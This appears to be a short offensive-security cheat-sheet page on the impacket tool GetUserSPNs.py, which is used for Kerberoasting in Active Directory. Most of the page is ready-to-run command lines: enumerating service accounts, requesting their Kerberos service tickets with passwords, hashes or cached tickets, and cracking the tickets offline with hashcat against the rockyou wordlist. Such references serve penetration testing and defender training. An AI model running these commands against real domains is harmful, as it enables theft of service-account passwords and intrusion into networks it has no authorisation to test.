Skip to content

GetUserSPNs

Description

This module will try to find Service Principal Names that are associated with normal user account. Since normal account's password tend to be shorter than machine accounts, and knowing that a TGS request will encrypt the ticket with the account the SPN is running under, this could be used for an offline bruteforcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.

Usage

GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password
GetUserSPNs.py -dc-ip 10.10.10.10 qu35t.pw/svc_user:password -request
GetUserSPNs.py -usersfile users.txt -no-pass -dc-ip 10.10.10.10 qu35t.pw/

Authentication

GetUserSPNs.py -hashes LMHASH:NTHASH -dc-ip 10.10.10.10 qu35t.pw/svc_user
GetUserSPNs.py -dc-ip 10.10.10.10 -no-pass qu35t.pw/svc_user
export KRB5CCNAME=svc_user.ccache
GetUserSPNs.py -k -no-pass -dc-host dc1.qu35t.pw qu35t.pw/svc_user

Hashcat Cracking

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

References